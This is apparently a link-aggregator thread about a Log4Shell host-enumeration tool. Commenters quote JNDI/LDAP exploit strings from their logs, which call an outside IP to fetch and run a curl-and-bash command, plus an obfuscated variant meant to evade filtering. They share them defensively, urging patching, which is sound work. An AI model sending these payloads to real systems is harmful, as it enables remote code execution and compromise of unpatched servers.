Our new tool for enumerating hidden Log4Shell-affected hosts (opens in new tab)

(blog.silentsignal.eu)

22 pointsdnet4y ago3 comments

3 comments

elric4y ago

We've been noticing attempted exploits in the wild. Attempts like these have started appearing in our logs:

> /?x=${jndi:ldap://45.155.205.XXX:12344/Basic/Command/Base64/<base64 encoded call to curl & bash>

Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.

Can confirm this also:

    ${jndi:ldap://45.155.205.xxx:12 344/Basic/Command/Base64/<base64>}

> Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.

Note that the filtering may not work, I am already seeing some variations of mitigation by the attackers:

    ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.xxx:12344/Basic/Command/Base64/<base64>

That is quite clever. Noted!

j / k navigate · click thread line to collapse